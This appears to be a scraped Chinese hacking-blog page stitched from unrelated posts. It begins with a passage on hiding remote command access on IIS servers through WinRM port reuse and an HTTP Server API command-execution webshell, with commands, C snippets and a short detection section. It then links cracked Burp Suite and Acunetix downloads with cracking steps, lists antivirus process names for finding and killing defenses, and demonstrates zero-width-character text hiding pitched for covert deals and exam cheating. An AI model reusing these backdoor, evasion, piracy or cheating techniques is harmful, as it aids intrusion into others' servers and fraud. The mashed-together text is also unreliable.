    Reserved URL            : https://+:5986/wsman/
        User: NT SERVICE\WinRM
            Listen: Yes
            Delegate: No
        User: NT SERVICE\Wecsvc
            Listen: Yes
            Delegate: No
            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147
-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351
7)

5985对应http的端口,5986对应https的端口

2.WinRM服务

学习资料:

https://docs.microsoft.com/en-us/windows/win32/winrm/portal

全称Windows Remote Management,能够实现在远程主机上执行命令

3.HTTP Server API

学习资料:

https://docs.microsoft.com/en-us/windows/win32/http/http-api-start-page

HTTP Server API使应用程序能够接收定向到URL的HTTP请求并发送HTTP响应

0x03 利用WinRM服务实现端口复用

注:

Twi1ight的文章已经介绍了这部分内容,感谢他的分享,地址如下:

https://paper.seebug.org/1004/

本节仅对此文章中的内容进行归纳整理并稍作补充

Windows Server 2008默认关闭WinRM服务,Windows Server 2012默认开启

注:

以下操作需要获得管理员权限

1.如果系统已开启WinRM服务

(1)查看监听配置

winrm e winrm/config/listener

默认监听5985端口,为了不修改默认配置,这里需要新增80端口

注:

查看WinRM配置的命令如下:

winrm get winrm/config

(2)新增80端口

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

补充:

删除80端口的命令如下:

winrm set winrm/config/service @{EnableCompatibilityHttpListener="false"}

注:

如果未新增80端口,远程连接需要指定5985端口,示例如下:

winrs -r:http://192.168.112.129:5985 -u:test -p:1234 "whoami"

(3)允许Administrators组中的所有帐户访问该服务

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

注:

如果不设置此项,远程连接时只能使用内置管理员帐户Administrator

2.如果系统未开启WinRM服务

(1)使用默认配置开启并配置服务

Winrm quickconfig -q

将自动执行以下操作:

  • 启动WinRM服务,并将服务启动类型设置为自动启动
  • 添加监听配置
  • 添加防火墙规则

(2)修改默认端口

开启服务后,默认监听5985端口,为了更隐蔽,这里需要将默认端口5985修改为80端口

修改http默认端口为80:

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

注:

还原http默认端口为5985的命令如下:

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="5985"}

(3)允许Administrators组中的所有帐户访问该服务

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

注:

如果不设置此项,远程连接时只能使用内置管理员帐户Administrator

3.通过WinRM服务连接远程主机

本地系统需要使用同远程主机相同的语言环境

(1)本地系统开启WinRM服务

Winrm quickconfig -q

(2)本地系统设置访问规则,允许连接所有主机

winrm set winrm/config/Client @{TrustedHosts="*"}

注:

删除该访问规则的命令如下:

winrm set winrm/config/Client @{TrustedHosts=""}

(3)连接远程主机的命令示例

如果为默认5985端口,命令如下:

winrs -r:http://192.168.112.129:5985 -u:administrator -p:1234 "whoami"

如果为80端口,命令如下:

winrs -r:http://192.168.112.129 -u:administrator -p:1234 "whoami"

0x04 利用HTTP Server API实现端口复用


1.示例代码测试

下载地址:

https://docs.microsoft.com/en-us/windows/win32/http/http-server-sample-application

代码支持同时注册多个URL,处理请求,发送HTTP响应

简单测试如下:

服务器IP为192.168.112.129

管理员权限执行:

http-server-sample-application.exe http://+:80/MyUri1 http://+:80/MyUri2

打开浏览器分别访问http://192.168.112.129:80/MyUri1和http://192.168.112.129:80/MyUri2

接收的结果如下图

Image may be NSFW.
Clik here to view.
Alt text

示例代码通过API HttpAddUrl()将URL注册为Listen On,默认配置下,需要管理员权限才能添加成功,否则产生错误:HttpAddUrl failed with 5,提示权限不够

但可以通过添加url acl(需要管理员权限)的方式实现普通用户权限下的正常运行

2.通过添加url acl(需要管理员权限)的方式实现示例代码以普通用户权限运行

方法如下:

添加url acl,授予Everyone用户对指定URL的权限,命令如下(管理员权限):

netsh http add urlacl url=http://+:80/MyUri user=everyone

注:

删除该url acl的命令如下:

netsh http delete urlacl url=http://+:80/MyUri

再次执行测试程序(普通用户权限),命令如下:

http-server-sample-application.exe http://+:80/MyUri

执行成功

3.借助已有的url acl实现示例代码以普通用户权限运行

列出所有URL的DACL,命令如下:

netsh http show urlacl

注意到默认配置下包含以下acl:

 Reserved URL            : http://+:80/Temporary_Listen_Addresses/
       User: \Everyone
           Listen: Yes
           Delegate: No
           SDDL: D:(A;;GX;;;WD)

User为Everyone,所以我们可以借助这个url

执行示例程序(普通用户权限),命令如下:

http-server-sample-application.exe http://+:80/Temporary_Listen_Addresses/MyUri

执行成功

4.修改示例代码,实现命令执行

思路如下:

通过GET请求发送要执行的cmd命令,格式为?<command>

例如:http://192.168.112.129/MyUri?whoami,要执行的命令为whoami,在Response中回复执行的结果

对于不符合格式的GET和POST请求,在Response中回复404

实现代码:

以示例程序为模板,需要修改以下位置:

(1)使用?传入参数

pRequest->CookedUrl.pQueryString能够读取参数,但包括了无用的字符?,实际执行命令时需要去掉pRequest->CookedUrl.pQueryString的第一个字符

去掉pRequest->CookedUrl.pQueryString第一个字符的C代码如下:

WCHAR *QueryString = new WCHAR[pRequest->CookedUrl.QueryStringLength-1];
wcsncpy_s(QueryString, wcslen(QueryString), pRequest->CookedUrl.pQueryString + 1, wcslen(QueryString) - 1);
wprintf_s(L"%s\n", QueryString);

(2)特殊字符的替换

  • 空格被转码为%20
  • “被转码为%22
  • ‘被转码为%27

例如浏览器输入字符串whoami /all,会被转码为whoami%20/all,这条命令无法直接在命令行下执行

还原URL编码的C代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/UrlDecode.cpp

代码支持多字节字符集和Unicode字符集

(3)使用管道读入命令并执行,回传结果

使用管道执行cmd命令并获取结果的代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/UsePipeToExeCmd.cpp

(4)修改回传结果的格式

回传的结果需要作格式转换,\n换行符转换成html中的</br>,否则浏览器显示的内容无法换行

将文本中的换行符(\n)转换成html中换行符(</br>)的代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/TextToHtmlofNewline.cpp

最终实现的代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/HTTPServerWebshell.cpp

只有输入特定格式的url能够执行命令,否则提示404

如下图

Image may be NSFW.
Clik here to view.
Alt text

命令实例:

http://192.168.112.129/MyUri?net%20start

如下图

Image may be NSFW.
Clik here to view.
Alt text

https协议也支持,命令实例:

https://192.168.112.129/MyUri?net%20start

如下图

Image may be NSFW.
Clik here to view.
Alt text

0x05 利用方法


Windows服务器开启了IIS服务,防火墙仅允许80或443端口进行通信,在不使用webshell的前提下,实现对该服务器远程管理的方法如下:

1.使用管理员权限

(1)使用WinRM服务

需要开启WinRM服务

需要Administrators组中的帐户口令或hash

(2)使用HTTP Server API

可以使用任意url

注:

80和443端口都可以

2.使用普通用户权限

(1)使用HTTP Server API

使用已有的url acl:http://+:80/Temporary_Listen_Addresses/

注:

无法使用443端口

0x06 检测方法


使用以下方法检测当前IIS服务器的端口共享功能是否被滥用

1.检测正在使用的url

如果使用了HTTP Server API,程序在运行时会注册url,查看命令如下:

netsh http sh ser

可疑结果示例:

Server session ID: D000000020000174
    Version: 1.0
    State: Active
    Properties:
        Max bandwidth: 4294967295
        Timeouts:
            Entity body timeout (secs): 120
            Drain entity body timeout (secs): 120
            Request queue timeout (secs): 120
            Idle connection timeout (secs): 120
            Header wait timeout (secs): 120
            Minimum send rate (bytes/sec): 150
    URL groups:
    URL group ID: AC0000004000017C
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Max bandwidth: inherited
            Max connections: inherited
            Timeouts:
                Timeout values inherited
            Number of registered URLs: 1
            Registered URLs:
                HTTP://192.168.112.129:80:192.168.112.129/MYURI/

Server session ID: D000000020000173
    Version: 1.0
    State: Active
    Properties:
        Max bandwidth: 4294967295
        Timeouts:
            Entity body timeout (secs): 120
            Drain entity body timeout (secs): 120
            Request queue timeout (secs): 120
            Idle connection timeout (secs): 120
            Header wait timeout (secs): 120
            Minimum send rate (bytes/sec): 150
    URL groups:
    URL group ID: AC0000004000017B
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Max bandwidth: inherited
            Max connections: inherited
            Timeouts:
                Timeout values inherited
            Number of registered URLs: 1
            Registered URLs:
                HTTPS://192.168.112.129:443:192.168.112.129/MYURI/
                
Server session ID: D600000020000077
    Version: 1.0
    State: Active
    Properties:
        Max bandwidth: 4294967295
        Timeouts:
            Entity body timeout (secs): 120
            Drain entity body timeout (secs): 120
            Request queue timeout (secs): 120
            Idle connection timeout (secs): 120
            Header wait timeout (secs): 120
            Minimum send rate (bytes/sec): 150
    URL groups:
    URL group ID: BF00000040000120
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Max bandwidth: inherited
            Max connections: inherited
            Timeouts:
                Timeout values inherited
            Number of registered URLs: 1
            Registered URLs:
                HTTP://+:80/TEMPORARY_LISTEN_ADDRESSES/

2.查看WinRM服务配置

如果攻击者获得了管理员权限,WinRM服务配置有可能被滥用

查看监听配置:

winrm e winrm/config/listener

查看是否开启可疑端口

0x07 小结


本文解决了如下问题:

Windows服务器开启了IIS服务,防火墙仅允许80或443端口进行通信,那么如何在不使用webshell,并且只有普通用户权限,实现对该服务器的远程管理?

解决方法:

使用代码:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/HTTPServerWebshell.cpp

使用已有的url acl,命令参数如下:

HTTPServerWebshell.exe http://+:80/Temporary_Listen_Addresses/

from

burp2.1破解版下载 burpsuite pro v2.1 cracked

burp2.1破解版下载 burpsuite pro v2.1 cracked
下载地址:pan.baidu.com/s/1xTOFfX9kqPMWQONskdySaA
提取码: ts4d
解压密码 www.ddosi.com

关于burpsuite说明以及burp功能操作请参考往期文章
https://www.ddosi.com/?s=burp

解压运行burpsuite_pro_v2.1_BurpHelper.jar 文件即可完成破解,无需像以往一样复制粘贴…

Image may be NSFW.
Clik here to view.
burp2.1破解版下载
雨苁:转载自telegram,安全性自测
Image may be NSFW.
Clik here to view.
burp2.1破解版下载
Image may be NSFW.
Clik here to view.
burp2.1破解版下载
Image may be NSFW.
Clik here to view.
burp2.1破解版下载

burp2.1破解版下载 burpsuite pro v2.1 cracked
下载地址:pan.baidu.com/s/1xTOFfX9kqPMWQONskdySaA
提取码: ts4d
解压密码 www.ddosi.com
————————————————————
burp2.1破解版亲测可用,但保险起见
请放虚拟机中运行,Go GO G0.


awvs破解版下载-Acunetix 12.0.190902105 cracked

awvs破解版下载-Acunetix 12.0.190902105 cracked 亲测可用
awvs12破解版下载 awvs12.0.190902105
该文件来自于国外论坛,安全性自测,请放虚拟机中运行,For your safety

awvs破解版下载链接:https://www.lanzous.com/b00n4m1ri/ 
提取密码 ddosi.com
解压密码 www.ddosi.com
百度云抽风,无法分享,本次用蓝奏云进行分享,有最大上传文件限制,因此切割成两份文件,请下载两份文件,放在一起再解压part1即可.

Image may be NSFW.
Clik here to view.
awvs破解版
awvs破解版

下载解压文件后有三个文件

Image may be NSFW.
Clik here to view.
awvs破解版
awvs破解版

破解步骤:

1: 运行acunetix_trial.exe文件进行安装.

2:复制”license_info.json”该文件
放在此目录下”C:\ProgramData\Acunetix Trial\shared\license” 
替换原文件

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3: license_info.json 该文件设置成只读,否则前功尽弃.(这一步很关键) +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Image may be NSFW.
Clik here to view.
awvs破解版
awvs破解版

4:  把”wvsc.exe” 复制到该目录下”C:\Program Files (x86)\Acunetix Trial\190902105″

Image may be NSFW.
Clik here to view.
awvs破解版
awvs破解版

5:退出重新登陆后即可完成awvs的破解

Image may be NSFW.
Clik here to view.
awvs破解版
awvs破解版

更新了什么没写,懒得写。
具体自己参考往期描述或官方文档
https://www.ddosi.com/?s=awvs
https://www.acunetix.com/blog/releases/

awvs破解版下载链接:https://www.lanzous.com/b00n4m1ri/
提取密码 ddosi.com
解压密码 www.ddosi.com
百度云抽风,无法分享,本次用蓝奏云进行分享,有最大上传文件限制,因此切割成两份文件,请下载两份文件,放在一起再解压part1即可.

该文件来自于国外论坛,安全性自测,请放虚拟机中运行,For your safety
https://raidforums.com/Thread-Acunetix-12-0-190902105-2-September-2019

Windows杀软在线查询 杀毒软件查询-黑客必备

Windows杀软在线查询 杀毒软件查询-黑客必备
https://www.ddosi.com/av/1.php

发现服务器有漏洞,可以执行一些命令时,想拿webshell时,想进一步提权时,需要过狗时,bypass时,服务进程太多看不过来时,不想浪费时间找服务器上的狗时,需要把所有的明岗暗哨找到时………..请打开如下链接, find and kill it.

链接地址: https://www.ddosi.com/av/1.php

Image may be NSFW.
Clik here to view.
Windows杀软在线查询
输入进程后是这个亚子的

下面列出的是所有的杀毒软件和对应的进程名称

    "360tray.exe": "360安全卫士-实时保护", 
    "360safe.exe": "360安全卫士-主程序", 
    "ZhuDongFangYu.exe": "360安全卫士-主动防御", 
    "360sd.exe": "360杀毒", 
    "a2guard.exe": "a-squared杀毒", 
    "ad-watch.exe": "Lavasoft杀毒", 
    "cleaner8.exe": "The Cleaner杀毒", 
    "vba32lder.exe": "vb32杀毒", 
    "MongoosaGUI.exe": "Mongoosa杀毒", 
    "CorantiControlCenter32.exe": "Coranti2012杀毒", 
    "F-PROT.exe": "F-Prot AntiVirus", 
    "CMCTrayIcon.exe": "CMC杀毒", 
    "K7TSecurity.exe": "K7杀毒", 
    "UnThreat.exe": "UnThreat杀毒", 
    "CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒", 
    "AVWatchService.exe": "VIRUSfighter杀毒", 
    "ArcaTasksService.exe": "ArcaVir杀毒", 
    "iptray.exe": "Immunet杀毒", 
    "PSafeSysTray.exe": "PSafe杀毒", 
    "nspupsvc.exe": "nProtect杀毒", 
    "SpywareTerminatorShield.exe": "SpywareTerminator杀毒", 
    "BKavService.exe": "Bkav杀毒", 
    "MsMpEng.exe": "Microsoft Security Essentials", 
    "SBAMSvc.exe": "VIPRE", 
    "ccSvcHst.exe": "Norton杀毒", 
    "f-secure.exe": "冰岛", 
    "avp.exe": "Kaspersky", 
    "KvMonXP.exe": "江民杀毒", 
    "RavMonD.exe": "瑞星杀毒", 
    "Mcshield.exe": "Mcafee", 
    "Tbmon.exe": "Mcafee", 
    "Frameworkservice.exe": "Mcafee", 
    "egui.exe": "ESET NOD32", 
    "ekrn.exe": "ESET NOD32", 
    "eguiProxy.exe": "ESET NOD32", 
    "kxetray.exe": "金山毒霸", 
    "knsdtray.exe": "可牛杀毒", 
    "TMBMSRV.exe": "趋势杀毒", 
    "avcenter.exe": "Avira(小红伞)", 
    "avguard.exe": "Avira(小红伞)", 
    "avgnt.exe": "Avira(小红伞)", 
    "sched.exe": "Avira(小红伞)", 
    "ashDisp.exe": "Avast网络安全", 
    "rtvscan.exe": "诺顿杀毒", 
    "ccapp.exe": "Symantec Norton", 
    "NPFMntor.exe": "Norton杀毒软件相关进程", 
    "ccSetMgr.exe": "赛门铁克", 
    "ccRegVfy.exe": "Norton杀毒软件自身完整性检查程序", 
    "vptray.exe": "Norton病毒防火墙-盾牌图标程序", 
    "ksafe.exe": "金山卫士", 
    "QQPCRTP.exe": "QQ电脑管家", 
    "Miner.exe": "流量矿石", 
    "AYAgent.exe": "韩国胶囊", 
    "patray.exe": "安博士", 
    "V3Svc.exe": "安博士V3", 
    "avgwdsvc.exe": "AVG杀毒", 
    "QUHLPSVC.exe": "QUICK HEAL杀毒", 
    "mssecess.exe": "微软杀毒", 
    "SavProgress.exe": "Sophos杀毒", 
    "fsavgui.exe": "F-Secure杀毒", 
    "vsserv.exe": "比特梵德", 
    "remupd.exe": "熊猫卫士", 
    "FortiTray.exe": "飞塔", 
    "safedog.exe": "安全狗", 
    "parmor.exe": "木马克星", 
    "Iparmor.exe.exe": "木马克星", 
    "beikesan.exe": "贝壳云安全", 
    "KSWebShield.exe": "金山网盾", 
    "TrojanHunter.exe": "木马猎手", 
    "GG.exe": "巨盾网游安全盾", 
    "adam.exe": "绿鹰安全精灵", 
    "AST.exe": "超级巡警", 
    "ananwidget.exe": "墨者安全专家", 
    "AVK.exe": "GData", 
    "avg.exe": "AVG Anti-Virus", 
    "spidernt.exe": "Dr.web", 
    "avgaurd.exe": "Avira Antivir", 
    "vsmon.exe": "ZoneAlarm", 
    "cpf.exe": "Comodo", 
    "outpost.exe": "Outpost Firewall", 
    "rfwmain.exe": "瑞星防火墙", 
    "kpfwtray.exe": "金山网镖", 
    "FYFireWall.exe": "风云防火墙", 
    "MPMon.exe": "微点主动防御", 
    "pfw.exe": "天网防火墙", 
    "S.exe": "在抓鸡", 
    "1433.exe": "在扫1433", 
    "DUB.exe": "在爆破", 
    "ServUDaemon.exe": "发现S-U", 
    "BaiduSdSvc.exe": "百度杀毒-服务进程", 
    "BaiduSdTray.exe": "百度杀毒-托盘进程", 
    "BaiduSd.exe": "百度杀毒-主程序", 
    "SafeDogGuardCenter.exe": "安全狗", 
    "safedogupdatecenter.exe": "安全狗", 
    "safedogguardcenter.exe": "安全狗", 
    "SafeDogSiteIIS.exe": "安全狗", 
    "SafeDogTray.exe": "安全狗", 
    "SafeDogServerUI.exe": "安全狗", 
    "D_Safe_Manage.exe": "D盾", 
    "d_manage.exe": "D盾", 
    "yunsuo_agent_service.exe": "云锁", 
    "yunsuo_agent_daemon.exe": "云锁", 
    "HwsPanel.exe": "护卫神", 
    "hws_ui.exe": "护卫神", 
    "hws.exe": "护卫神", 
    "hwsd.exe": "护卫神", 
    "hipstray.exe": "火绒", 
    "wsctrl.exe": "火绒", 
    "usysdiag.exe": "火绒", 
    "WEBSCANX.EXE": "网络病毒克星", 
    "SPHINX.EXE": "SPHINX防火墙", 
    "bddownloader.exe": "百度卫士", 
    "baiduansvx.exe": "百度卫士-主进程", 
    "AvastUI.exe": "Avast!5主程序"

from github
Windows杀软在线查询 杀毒软件查询-黑客必备
https://www.ddosi.com/av/1.php

0宽字符隐藏文本加密

下面的这句话里面隐藏了一些肉眼不可见的信息
地址:
http://morse.rovelast.com/
https://yuanfux.github.io/zero-width-web/

一池同源黄金血,‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‌‌‌​‌‌‍‍‍​‍‌‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‌‌‍‍​‌​‌‌‌‌‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‍‍‍‍​‌‌‍‌​‌‍​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‌‍‍‍‍​‌​‌‍​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‌​‍‌‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌‌‌‌‌​‍‌‌‌‌​‍‌‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‌‌‌‌​‍‍‍‍‍​‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌‌​‍‍‍‌‌​‌‌‌‌‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‍‌‍‌​‍‍‍‍‍​‌‌‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‍‌‌‌​‌‌‍‌​‌‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‌‌‍‍‍​‌‌‌‍‍​‌‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‌‌‍‌​‌‌‍‌​‍‍‍‍‌换开白色地狱门

复制上面这句话,到下面的网站打开进行解密,你就可以看到隐藏的信息
http://morse.rovelast.com/

Image may be NSFW.
Clik here to view.
0宽字符隐藏文本加密
0宽字符隐藏文本加密
他强任他强,清风抚山岗‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‌‌‌‌​‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‌‌‍‍‍​‍‌‍‌​‌‍‍‍‍​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‌‌‌‌‌​‌‌‌‍‍​‍‌‌‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‌‍‌​‌‌‌‌‌​‌‌‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌​‌‌‌‌‌​‍‌‌‌‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‍‍​‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‌‌‍‍‍​‍‌‌‌‌​‌‌‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌​‍‍‍‍‍​‌‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‍‍‍‌‌​‍‍‍‌‌​‌‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‍‍‍‍‌​‌‌‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‌‌‍‌​‍‌‌‌‌​‌‍‍‍‍他横由他横,明月照大江

这个东西有什么用处呢?好像仅仅是好玩—–

①用来进行传输一些见不得光的信息,比如下面的这句,里面隐藏的内容就是
有内鬼 交易取消 改成早上8点在火车站见面

好的,我们12点在‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‌‌‌​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‍‍‍‍​‍‍‍‌‌​‌‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‌‌‌​‌‌‌‍‍​‍‌‍‌​‍‌‌‌‍​‍‌‌‌‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‌‍​‌‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‌‌‌‌​‌‍‍‍‍​‌‌‌‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‌‌‍‍​‍‌‌​‍‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‌‌​‍‍‍‌‌​‍‍‍‌‌​‍‌‌‌‍​‍‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌‌‌‌‌​‌‌‌‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌‌‍‍‍​‌‍‍‍‍​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌‌‌‌‌​‌​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‍‍​‌‍​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‍‍‍‍​‍‌‌‌​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‍‍‌‌‌​‌‌‍‍‍​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‍‍‍‍​‍‌‌‌‌​‍‌‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‌‌‍‌​‍‌‌‌‌​‍‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‌‍​‍‌‌​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‌‌​‍‍‍‍‌​‍‌‍‌​‌‍‍‍‍​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‌‌‌​‍‌‌‌‌​‌‌‍‍‍码头见面

②用来进行作弊—被逮到但是没有证据–成功脱险.
待会考完试‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌‌‍‍‍​‌​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‌‌​‍‍‍‍‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌​‌‌‍‍‍​‍‌‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‌‌​‍‍‍‍‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌​‌‌‌‌‌​‌‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‍‌‌​‌‌‌‌‍​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‌‍‌​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‌‌‌‌‍​‍‍‍‌‌吃什么? 这句隐藏的信息是 : 选择题第三题答案选什么
吃火锅‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‌‌‌​‍‍‍‍‍​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‌‌‌‍​‍‍‍‍‍​‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‍‍​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‌‌‍‍‍​‌‍​‍‌‌‌‍​‍‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌​‌‌‍‍‍​‍‌‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‌‌​‍‌‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‌‌​‍‍‍‍‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‍‍‍‍‍​‌‌‌‌‌​‌‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‍‍‍‍​‌‌‍‌​‌‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‌‌‌​‍‌‌‌‌​‌‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‌‍‌​‌‍​‌‍‍‍‍怎么样? 这句隐藏的信息为 : 选最后一个 第二题做出来没

待会考完试‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‌‌‍‍‍​‌​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‌‌​‍‍‍‍‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌​‌‌‍‍‍​‍‌‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‌‌​‍‍‍‍‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌​‌‌‌‌‌​‌‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‍‌‌​‌‌‌‌‍​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‌‍‌​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‌‌‌‌‍​‍‍‍‌‌吃什么?
吃火锅‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‍‍​‍‍‍‍‍​‍‍‍‍‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‌‌‌​‍‍‍‍‍​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‌‌‌‍​‍‍‍‍‍​‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‍‍​‍‍‍‍‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‌‌‍‍‍​‌‍​‍‌‌‌‍​‍‌‌‌‍​‌‍‍‌‍​‌‌‍​‍‍‌‌‌​‍‌‌‌​‌‌‍‍‍​‍‌‍‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‍​‌​‍‍‍‌‌​‍‌‍‌​‌‍‍‌‍​‌‌‍​‍‍‍‍‌​‍‍‍‌‌​‍‍‍‍‌​‍‍‍‌‌​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‍‍‍‍‍​‌‌‌‌‌​‌‍​‌‍‍‌‍​‌‌‍​‌‌‌‌‌​‌‍‍‍‍​‌‌‍‌​‌‍​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‍‌‌‌​‍‌‌‌‌​‌‌‌‌‌​‌‍‍‌‍​‌‌‍​‍‌‌‌‌​‍‌‍‌​‌‍​‌‍‍‍‍怎么样?

③当然是拿来开车啦,少儿不宜,略去——需要加密符号字母的用这个
https://yuanfux.github.io/zero-width-web/

演示结果如下: 隐藏信息为www.ddosi.com
此处用 https://yuanfux.github.io/zero-width-web/ 进行解密

鲲‍​‍​‍​‏‏​‎‎​‎‎​‌‏​‍‎​‏‎​‏‏​‍​‌‏​‏之大,需要两个烧烤架!
Image may be NSFW.
Clik here to view.
0宽字符隐藏文本加密
0宽字符隐藏文本加密

